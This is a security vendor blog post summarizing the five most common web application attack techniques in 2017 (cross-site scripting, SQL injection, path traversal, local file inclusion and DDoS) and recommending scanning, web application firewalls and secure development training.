In era when so many cyberattacks rely on deluding an unsuspecting person into doing something they shouldn't - from clicking on a link or opening an attachment to agreeing to wire huge sums of money to an impostor - methods still exist that largely keep the user out of the malicious equation. For the bad guys, that means one less impediment is in their way.
We're talking about web applications, easily the most common method of compromise against e-commerce websites -- but really any company with an internet presence. They don't get quite the same publicity as, for example, ransomware attacks do, but they should: Some of the most publicized data breaches of the last several years were the result of successful attacks against web apps, and the reason they were exploitable was mostly due to human error or negligence. In fact, a stunning 100 percent of web apps that the Trustwave SpiderLabs team tested in 2017 contained at least one vulnerability. The median number of vulnerabilities detected per application in 2017 was 11 and the largest number of vulnerabilities in a single application was 154.
While security professionals are getting better at pushing back against rush-to-market pressures, many organizations are still facing the consequences of insecure properties seeing the light of day and earning the ire of attackers - especially in the era of cryptocurrency, where adversaries are compromising applications to mine digital coins and pillage exchanges.
Miscreants are also actively targeting content management systems. In recent editions of the Trustwave Global Security Report, we discussed how popular content management systems (CMSes) represent potentially lucrative targets for attackers. When they discover a significant weakness in a widely adopted CMS, it places every installation of that CMS at risk for exploitation, not only before the fix is available but also for considerable time afterward. Attackers use automated tools to find CMS installations to target.
Much has changed across the attack landscape in past 10 years, with many alterations in the top actors, their motives, toolsets, attack frameworks and targeted exploits. Targeted attacks have become more common and are becoming more sophisticated: Many high-profile breach incidents show signs of significant preplanning by attackers who carefully identify weak packages and tools on targeted servers before making a move.
At the same time, the basic web application attack techniques that saboteurs are using tend to be the same ones they've been relying on for years, especially these five (as documented in the 2018 Trustwave Global Security Report):
1. Cross-Site Scripting (XSS)
Involved in about 40 percent of web attack attempts last year, this remains the most common attack technique we see. XSS typically involves inducing a website to execute arbitrary or malicious script code an attacker uploaded, usually because the site fails to properly sanitize user-submitted inputs. If another visitor loads the malicious or compromised web page, their browser may execute the malicious code, infecting the victim. Most XSS attacks are not particularly sophisticated, and we see a lot of attacks come from so-called script kiddies, who are inexperienced attackers using scripts and tools others wrote.
2. SQL Injection (SQLi)
At about 24 percent of web attack attempts, this was the second most common attack technique we witnessed. The most common form of SQLi occurs when an attacker enters malicious SQL code into a field on a web page and the server-side code submits it to the database without properly sanitizing it first. A successful SQLi attack can delete or change sensitive data or reveal it to the attacker.
3. Path Traversal
These web attacks were used in about 7 percent of cases we examined. They attempt to access unauthorized files or directories outside the web root folder by injecting patterns such as "../" to move up in the server directory hierarchy. Successful path-traversal can allow attackers to improperly access site or user credentials, configuration files, databases or other sites co-located on the same physical machine. As with XSS and SQLi, successful path traversal attacks usually result from inadequate input sanitization and often are combined with other attacks, such as local file inclusion, to steal the targeted data or credentials.
4. Local File Inclusion (LFI)
Observed in about 4 percent of attacks, this is where the attacker uses directory traversal or a similar mechanism to induce the web application to execute a file residing elsewhere on the server.
5. Distributed Denial of Service (DDoS)
These accounted for about 3 percent of attacks we examined. DDoS involves commanding numerous computers, typically compromised computers in a botnet, to bombard a targeted web server with requests, overloading its resources and rendering it unavailable to legitimate visitors. While DDoS alone does not provide an attacker with improper access to any resources, in 2017 we saw a trend of attackers increasingly using DDoS alongside other attacks to distract automated defense systems from responding to an issue.
A Quick Refresher: Three Types of Protections
Aside from ensuring patches are applied according to your priority schedule, here are three steps your business can take to stay defended against web application attacks:
1. Vulnerability Scanning and Security Testing: The power of web applications to connect outside users to data and services easily makes them big targets for attackers. Scanning and testing databases, networks and applications throughout the development lifecycle - from design to development to testing and ongoing maintenance - can offer you a unique perspective on where the vulnerabilities are, how dangerous they are (and for whom) and how to mitigate them. Ultimately your decision on whether to remediate any discovered flaws will be on your personal risk appetite, which may factor in the likelihood that a vulnerability will be breached and that data (and monetary) loss will result.
2. Web Application Firewalls (WAFs): WAFs provide an important line of defense for critical applications and data. Unlike traditional firewalls, which mainly control traffic based on the ports and protocols they use, a WAF controls access to web applications using rules designed to recognize and restrict suspicious activity, such as SQLi, XSS and exploitation of vulnerabilities. WAFs are updated continuously with new rules designed to catch the latest attack and exploitation techniques before they can harm important resources. They operate on the application layer, the highest level of the OSI model, and have access to all protocols on all networking layers. This gives them the power to protect websites from a wide range of attacks.
3. Secure Development Training (SDT): Instruction provides your developers, testers, project managers and architects with information about the latest components of secure software development, establishing a baseline of security awareness while preparing your staff to design, build and deploy secure software and applications.
Dan Kaplan is manager of online content at Trustwave. Read more Trustwave blogs here.